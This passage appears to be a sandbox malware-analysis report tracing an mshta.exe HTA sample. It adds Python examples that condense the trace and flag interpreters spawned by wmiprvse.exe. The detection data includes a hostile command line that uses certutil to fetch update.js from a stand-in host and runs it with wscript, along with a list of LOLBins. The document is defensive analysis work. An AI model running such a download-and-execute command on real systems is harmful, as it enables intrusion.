Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Time type = Ticks, time = 117296 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Module Get Address module_name = c:\windows\system32\ole32.dll, function = RevokeDragDrop, address_out = 0x7ffb3cb29710 True 1
Fn
System Get Time type = Ticks, time = 117390 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Time type = Ticks, time = 117390 True 1
Fn
Module Get Address module_name = c:\windows\system32\urlmon.dll, function = 527, address_out = 0x7ffb2eaae1d0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
System Get Cursor x_out = 1287, y_out = 746 True 1
Fn
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_CONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MENU, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LSHIFT, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LCONTROL, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LMENU, result_out = 0 True 1
Fn
Module Get Address module_name = c:\windows\system32\amsi.dll, function = AmsiUninitialize, address_out = 0x7ffb30c92490 True 1
Fn
Module Get Address module_name = c:\windows\system32\msls31.dll, function = 2, address_out = 0x7ffb2dcda8a0 True 1
Fn
COM Create interface = 8F88FD19-5D42-477B-BD45-F6A4A977ED05, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = Operating System True 1
Fn
Environment Get Environment String name = JS_DEBUG_SCOPE False 1
Fn
Debug Check for Presence c:\windows\system32\mshta.exe True 1
Fn
Module Load module_name = ntdll.dll, base_address = 0x7ffb3d310000 True 1
Fn
Module Get Filename process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\jscript9.dll, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernelbase.dll, base_address = 0x7ffb3a800000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadedAPI, address_out = 0x7ffb3a85a1b0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadsFromDll, address_out = 0x7ffb3a8be790 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\JScriptLegacy False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\JScriptLegacy False 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffb3d260000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = QueryProtectedPolicy, address_out = 0x7ffb3a86d460 True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
System Get Time type = System Time, time = 2018-02-15 18:29:25 (UTC) True 12
Fn
Module Unmap process_name = c:\windows\system32\mshta.exe True 1
Fn
Module Get Handle module_name = c:\windows\system32\oleaut32.dll, base_address = 0x7ffb3c9b0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\oleaut32.dll, function = 201, address_out = 0x7ffb3c9cb770 True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
Module Get Address module_name = c:\windows\system32\ole32.dll, function = CoDecrementMTAUsage, address_out = 0x7ffb3cd3b430 True 1
Fn
Module Unmap process_name = c:\windows\system32\mshta.exe True 1
Fn
Module Get Address module_name = c:\windows\system32\ole32.dll, function = OleUninitialize, address_out = 0x7ffb3cb2a4a0 True 1
Fn
System Sleep duration = -1 (infinite) True 2
Fn
Module Get Address module_name = c:\windows\system32\urlmon.dll, function = 488, address_out = 0x7ffb2eaae150 True 1
Fn
Thread 0xcb8
2 0
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\system32\mshtml.dll, base_address = 0x7ffb223a0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
Thread 0xcc0
8 0
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\system32\mshtml.dll, base_address = 0x7ffb223a0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS True 1
Fn
Module Get Address module_name = c:\windows\system32\combase.dll, function = CoInitializeEx, address_out = 0x7ffb3cce3170 True 1
Fn
System Get Time type = Ticks, time = 114234 True 1
Fn
System Get Time type = Ticks, time = 114328 True 1
Fn
Module Get Address module_name = c:\windows\system32\combase.dll, function = CoWaitForMultipleHandles, address_out = 0x7ffb3cca3ef0 True 1
Fn
System Get Time type = Ticks, time = 115093 True 1
Fn
System Get Time type = Ticks, time = 115656 True 1
Fn
Module Get Address module_name = c:\windows\system32\combase.dll, function = CoUninitialize, address_out = 0x7ffb3cce2380 True 1
Fn
Thread 0xcbc
1 0
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\system32\mshtml.dll, base_address = 0x7ffb223a0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS True 1
Fn
Thread 0xcc8
5 0
Category Operation Information Success Count Logfile
Module Load module_name = dxgi.dll, base_address = 0x7ffb37bf0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\dxgi.dll, function = CreateDXGIFactory, address_out = 0x7ffb37bf5de0 True 1
Fn
System Sleep duration = -1 (infinite) True 3
Fn
Thread 0xcf8
2 0
Category Operation Information Success Count Logfile
Module Get Handle module_name = C:\Windows\System32\jscript9.dll, base_address = 0x7ffb21f00000 True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
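Most of the mshta.exe trace above is Keyboard Read and System Get Cursor rows. They read only modifier and mouse-button virtual keys (VK_SHIFT, VK_CONTROL, VK_MENU and their left-hand variants, VK_LBUTTON, VK_RBUTTON, VK_MBUTTON) and every one returns 0; that is the HTML engine's normal input-state polling while it dispatches UI events, not a hook on keystrokes, and by itself it is not evidence of keystroke capture. The rows that matter for triage are few: amsi.dll is loaded and AmsiInitialize/AmsiScanString are resolved (the script text is handed to the registered AMSI provider before it runs), WbemScripting.SWbemLocator is requested with CLSCTX_LOCAL_SERVER and CLSCTX_REMOTE_SERVER (anything the HTA creates through WMI becomes a child of wmiprvse.exe rather than of mshta.exe), the WMI Default Impersonation Level is read back as 3 (Impersonate), and DuplicateTokenEx is resolved from advapi32.dll. The Python below is an added example, not part of the VMRay report or of the sample: it parses rows in this page's Sequential View format, folds the polling noise into counters, and lists the rows worth reading. The embedded sample is a constructed subset of lines copied from the trace above.

```python
import re
from collections import Counter

# One trace row: "<Category> <Operation> <key = value, ...> <True|False> <Count>".
# The "Fn" logfile-link rows and the table header do not match and are skipped.
ROW = re.compile(
    r"^(?P<cat>[A-Za-z]+) (?P<op>[A-Za-z ]+?) "
    r"(?P<info>\S+ = .*|\S+) (?P<ok>True|False) (?P<count>\d+)$"
)
# "key = value" pairs; a value may itself contain ", " (e.g. a CLSCTX flag list),
# so a pair ends only where the next "key = " begins.
KV = re.compile(r"(\w+) = (.*?)(?=, \w+ = |$)")

# Modifier and mouse-button keys that the HTML engine polls while dispatching
# UI events. Reads of these that return 0 are not evidence of keylogging.
UI_POLL_KEYS = {"VK_LBUTTON", "VK_RBUTTON", "VK_MBUTTON", "VK_SHIFT", "VK_CONTROL",
                "VK_MENU", "VK_LSHIFT", "VK_LCONTROL", "VK_LMENU"}
INTERESTING_APIS = {"AmsiInitialize", "AmsiScanString", "DuplicateTokenEx"}


def parse_rows(text):
    """Yield one dict per trace row, with the Information column split into args."""
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        row = m.groupdict()
        row["args"] = dict(KV.findall(row["info"]))
        row["ok"] = row["ok"] == "True"
        row["count"] = int(row["count"])
        yield row


def is_ui_poll(row):
    """True for the modifier-key, cursor-position and tick-count polling noise."""
    a = row["args"]
    if row["cat"] == "Keyboard" and row["op"] == "Read":
        return a.get("virtual_key_code") in UI_POLL_KEYS and a.get("result_out") == "0"
    return row["cat"] == "System" and row["op"] in ("Get Cursor", "Get Time")


def triage(text):
    """Condense a trace into counts of suppressed noise plus the rows worth reading."""
    rows = list(parse_rows(text))
    suppressed, key_reads, findings = Counter(), Counter(), []
    for r in rows:
        a = r["args"]
        if r["cat"] == "Keyboard" and r["op"] == "Read":
            key_reads[a.get("virtual_key_code")] += 1
            if is_ui_poll(r):
                suppressed["keyboard_poll"] += 1
                continue
            # A read of a character key would be worth a second look.
            findings.append(f"non-modifier key read: {a.get('virtual_key_code')}")
        elif is_ui_poll(r):
            suppressed["cursor_or_tick"] += 1
            continue
        if r["cat"] == "Module" and r["op"] == "Load" and a.get("module_name", "").lower() == "amsi.dll":
            findings.append("amsi.dll loaded: script text will be handed to the registered AMSI provider")
        elif r["cat"] == "Module" and r["op"] == "Get Address" and a.get("function") in INTERESTING_APIS:
            findings.append(f"resolved {a['function']} from {a['module_name']}")
        elif r["cat"] == "COM" and r["op"] == "Get Class ID" and a.get("prog_id") == "WbemScripting.SWbemLocator":
            findings.append("WbemScripting.SWbemLocator requested: any process it creates "
                            "will have wmiprvse.exe, not this process, as its parent")
        elif r["cat"] == "Registry" and r["op"] == "Read Value" and a.get("value_name") == "Default Impersonation Level":
            findings.append(f"WMI default impersonation level = {a.get('data')}")
        elif r["cat"] == "Debug" and r["op"] == "Check for Presence":
            findings.append(f"debugger-presence check by {r['info']}")
    return {"rows": len(rows), "suppressed": dict(suppressed),
            "key_reads": dict(key_reads), "findings": findings}


# Constructed sample: lines copied from the mshta.exe trace on this page (one "Fn" row included).
SAMPLE = r"""
Module Load module_name = amsi.dll, base_address = 0x7ffb30c90000 True 1
Fn
Module Get Address module_name = c:\windows\system32\amsi.dll, function = AmsiInitialize, address_out = 0x7ffb30c92260 True 1
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
System Get Cursor x_out = 1287, y_out = 746 True 1
COM Get Class ID cls_id = 76A64158-CB41-11D1-8B02-00600806D9B6, prog_id = WbemScripting.SWbemLocator True 1
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Impersonation Level, data = 3 True 1
Module Get Address module_name = c:\windows\system32\advapi32.dll, function = DuplicateTokenEx, address_out = 0x7ffb3c2e8f80 True 1
Debug Check for Presence c:\windows\system32\mshta.exe True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\EUDC\1252 False 1
"""

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(key, value)
```

Run it against a full trace pasted into SAMPLE and the findings list shrinks the several hundred rows above to the handful that describe what the HTA actually did; the key_reads counter stays as a sanity check that nothing beyond modifier keys was polled.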
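Because the script host reached for SWbemLocator, whatever the HTA launches through WMI is created by the WMI provider host: on the endpoint the child's parent is wmiprvse.exe (itself under svchost.exe -k netsvcs), and a parent-child rule keyed on mshta.exe never fires. The Python below is an added detection example, not code from the report or from the sample. It runs over constructed Sysmon-style process-creation records (the PIDs, paths, file names and the cdn.example.invalid URL are made up for the example) and flags interpreters or LOLBins parented by wmiprvse.exe, plus certutil -urlcache -f downloads, reporting each hit's ancestry so the missing link back to the script host is visible.

```python
# Interpreters and living-off-the-land binaries that have no business being
# started by the WMI provider host in a normal user session.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                       "mshta.exe", "certutil.exe", "rundll32.exe", "regsvr32.exe", "bitsadmin.exe"}


def basename(image):
    """Lower-case file name of an image path, tolerant of either slash style."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Image names from pid upward, stopping at the first parent we have no record for."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def is_certutil_download(cmdline):
    """certutil used as a downloader: -urlcache together with -f (either switch prefix)."""
    toks = cmdline.lower().split()
    return any(t in ("-urlcache", "/urlcache") for t in toks) and any(t in ("-f", "/f") for t in toks)


def wmi_spawn_alerts(events):
    """Return alerts for WMI-parented interpreters and certutil downloads, in event order."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        image = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        if parent and basename(parent["image"]) == "wmiprvse.exe" and image in SUSPICIOUS_CHILDREN:
            alerts.append({"rule": "wmi_spawned_interpreter", "pid": e["pid"], "image": image,
                           "cmdline": e["cmdline"], "ancestry": ancestry(events, e["pid"])})
        if image == "certutil.exe" and is_certutil_download(e["cmdline"]):
            alerts.append({"rule": "certutil_urlcache_download", "pid": e["pid"], "image": image,
                           "cmdline": e["cmdline"], "ancestry": ancestry(events, e["pid"])})
    return alerts


# Constructed process-creation events (Sysmon Event ID 1 fields reduced to what the rules need).
# The chain mirrors the shape of a WMI-launched command: the interpreter hangs off wmiprvse.exe,
# while the script host that asked for it sits in an unrelated branch under explorer.exe.
EVENTS = [
    {"pid": 600,  "ppid": 500,  "image": r"C:\Windows\System32\services.exe",
     "cmdline": r"C:\Windows\system32\services.exe"},
    {"pid": 812,  "ppid": 600,  "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\system32\svchost.exe -k netsvcs"},
    {"pid": 2780, "ppid": 812,  "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"},
    {"pid": 3004, "ppid": 2300, "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\Explorer.EXE"},
    {"pid": 4120, "ppid": 3004, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" "C:\Users\alice\Downloads\plugin.hta"'},
    {"pid": 4188, "ppid": 2780, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c certutil.exe -urlcache -split -f https://cdn.example.invalid/update "
                r"C:\Users\Public\update.js && wscript.exe C:\Users\Public\update.js"},
    {"pid": 4196, "ppid": 4188, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f https://cdn.example.invalid/update C:\Users\Public\update.js"},
    {"pid": 4204, "ppid": 4188, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\Public\update.js"},
    # Benign control: an interactive user hashing a download with certutil.
    {"pid": 5010, "ppid": 3004, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c certutil -hashfile C:\Users\alice\Downloads\setup.exe SHA256"},
    {"pid": 5022, "ppid": 5010, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -hashfile C:\Users\alice\Downloads\setup.exe SHA256"},
]

if __name__ == "__main__":
    for alert in wmi_spawn_alerts(EVENTS):
        print(alert["rule"], alert["pid"], " <- ".join(alert["ancestry"]))
```

wmiprvse.exe also parents processes created by legitimate management tooling (wmic process call create, configuration-management agents running scripts), so treat the first rule as a triage signal to allowlist per environment rather than a blocking rule; the ancestry field is what lets an analyst see at a glance that the command shell has no script host above it.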
Process #2: svchost.exe
0 0
Information Value
ID #2
File Name c:\windows\system32\svchost.exe
Command Line C:\Windows\system32\svchost.exe -k netsvcs
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:40, Reason: RPC Server
Unmonitor End Time: 00:10:05, Reason: Self Terminated
Monitor Duration 00:09:25
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x32c
Parent PID 0x1e4 (c:\windows\system32\services.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs 0xCAC, 0xCB0, 0xD28, 0xD2C, 0xD24, 0xD20, 0xD1C, 0xD18, 0xD04, 0xD00, 0x1A4, 0x810, 0xBD4, 0x9E0, 0x734, 0x890, 0x884, 0x528, 0x2B8, 0x4CC, 0x7F8, 0x7C4, 0x7A4, 0x7A0, 0x79C, 0x798, 0x794, 0x760, 0x790, 0x784, 0x780, 0x750, 0x72C, 0x720, 0x6F4, 0x6D0, 0x6A8, 0x6A4, 0x668, 0x638, 0x628, 0x1E0, 0x618, 0x600, 0x5F8, 0x5D0, 0x5AC, 0x5A0, 0x534, 0x4E0, 0x160, 0x190, 0x280, 0x154, 0x120, 0xF8, 0xF4, 0x3F4, 0x3F0, 0x3E0, 0x3D0, 0x3C8, 0x3A4, 0x394, 0x390, 0x330, 0x278, 0x200, 0xC4C, 0xC48, 0x568, 0xCE4, 0xCEC, 0xCE0, 0xD5C, 0xDB4, 0xE44, 0xE20, 0xE30, 0xE28, 0xE24, 0xD4C, 0xD48, 0xD38, 0xD40, 0xD44, 0xE54, 0xE60, 0xE64, 0xE74, 0xE58, 0xB0, 0xC60, 0x6E4, 0xEA0, 0x708, 0x2C0, 0x428, 0x68C, 0xB6C, 0xB24, 0x688, 0xEC4, 0x84, 0xFD4, 0xC30, 0xC54, 0xC44, 0xBEC, 0x5E4, 0x3E4, 0x788, 0xCD8, 0xDE0, 0xC74, 0x9E0, 0x200, 0x278 (IDs 0x9E0, 0x200 and 0x278 appear twice in the report, as thread IDs are reused once a thread exits)
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
pagefile_0x0000001c8ba50000 0x1c8ba50000 0x1c8ba5ffff Pagefile Backed Memory Readable, Writable True False False -
svchost.exe.mui 0x1c8ba60000 0x1c8ba60fff Memory Mapped File Readable False False False -
pagefile_0x0000001c8ba70000 0x1c8ba70000 0x1c8ba83fff Pagefile Backed Memory Readable True False False -
private_0x0000001c8ba90000 0x1c8ba90000 0x1c8bb0ffff Private Memory Readable, Writable True False False -
pagefile_0x0000001c8bb10000 0x1c8bb10000 0x1c8bb13fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000001c8bb20000 0x1c8bb20000 0x1c8bb20fff Pagefile Backed Memory Readable True False False -
private_0x0000001c8bb30000 0x1c8bb30000 0x1c8bb31fff Private Memory Readable, Writable True False False -
locale.nls 0x1c8bb40000 0x1c8bbfdfff Memory Mapped File Readable False False False -
private_0x0000001c8bc00000 0x1c8bc00000 0x1c8bc00fff Private Memory Readable, Writable True False False -
private_0x0000001c8bc10000 0x1c8bc10000 0x1c8bc10fff Private Memory Readable, Writable True False False -
private_0x0000001c8bc20000 0x1c8bc20000 0x1c8bc26fff Private Memory Readable, Writable True False False -
pagefile_0x0000001c8bc30000 0x1c8bc30000 0x1c8bc30fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000001c8bc40000 0x1c8bc40000 0x1c8bc40fff Pagefile Backed Memory Readable True False False -
private_0x0000001c8bc50000 0x1c8bc50000 0x1c8bc56fff Private Memory Readable, Writable True False False -
private_0x0000001c8bc60000 0x1c8bc60000 0x1c8bcdffff Private Memory Readable, Writable True True False
pagefile_0x0000001c8bce0000 0x1c8bce0000 0x1c8bce1fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000001c8bcf0000 0x1c8bcf0000 0x1c8bcf0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000001c8bd00000 0x1c8bd00000 0x1c8bdfffff Private Memory Readable, Writable True False False -
pagefile_0x0000001c8be00000 0x1c8be00000 0x1c8bebffff Pagefile Backed Memory Readable True False False -
iphlpsvc.dll.mui 0x1c8bec0000 0x1c8beccfff Memory Mapped File Readable False False False -
private_0x0000001c8bed0000 0x1c8bed0000 0x1c8bed6fff Private Memory Readable, Writable True False False -
gpsvc.dll.mui 0x1c8bee0000 0x1c8beecfff Memory Mapped File Readable False False False -
cversions.2.db 0x1c8bef0000 0x1c8bef3fff Memory Mapped File Readable True False False -
private_0x0000001c8bf00000 0x1c8bf00000 0x1c8bffffff Private Memory Readable, Writable True False False -
pagefile_0x0000001c8c000000 0x1c8c000000 0x1c8c187fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000001c8c190000 0x1c8c190000 0x1c8c310fff Pagefile Backed Memory Readable True False False -
private_0x0000001c8c320000 0x1c8c320000 0x1c8c41ffff Private Memory Readable, Writable True False False -
private_0x0000001c8c420000 0x1c8c420000 0x1c8c49ffff Private Memory Readable, Writable True False False -
cversions.2.db 0x1c8c4a0000 0x1c8c4a3fff Memory Mapped File Readable True False False -
private_0x0000001c8c4b0000 0x1c8c4b0000 0x1c8c4b6fff Private Memory Readable, Writable True False False -
propsys.dll.mui 0x1c8c4c0000 0x1c8c4d0fff Memory Mapped File Readable False False False -
For performance reasons, the remaining 432 entries are omitted.
The remaining entries can be found in flog.txt.
Process #3: wmiprvse.exe
Information Value
ID #3
File Name c:\windows\system32\wbem\wmiprvse.exe
Command Line C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:40, Reason: RPC Server
Unmonitor End Time: 00:10:33, Reason: Terminated by Timeout
Monitor Duration 00:09:53
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0xae8
Parent PID 0x248 (c:\windows\system32\svchost.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\Network Service
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0xB58, 0xB30, 0x37C, 0xA98, 0xABC, 0x7FC, 0x564, 0x8A4, 0xC58
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
pagefile_0x00000008937c0000 0x8937c0000 0x8937cffff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000008937d0000 0x8937d0000 0x8937d6fff Private Memory Readable, Writable True True False
pagefile_0x00000008937e0000 0x8937e0000 0x8937f3fff Pagefile Backed Memory Readable True False False -
private_0x0000000893800000 0x893800000 0x89387ffff Private Memory Readable, Writable True True False
pagefile_0x0000000893880000 0x893880000 0x893883fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000893890000 0x893890000 0x893890fff Pagefile Backed Memory Readable True False False -
private_0x00000008938a0000 0x8938a0000 0x8938a1fff Private Memory Readable, Writable True True False
locale.nls 0x8938b0000 0x89396dfff Memory Mapped File Readable False False False -
pagefile_0x0000000893970000 0x893970000 0x893971fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000008939f0000 0x8939f0000 0x8939f6fff Private Memory Readable, Writable True True False
private_0x0000000893a00000 0x893a00000 0x893a00fff Private Memory Readable, Writable True True False
private_0x0000000893a10000 0x893a10000 0x893a10fff Private Memory Readable, Writable True True False
user32.dll.mui 0x893a20000 0x893a24fff Memory Mapped File Readable False False False -
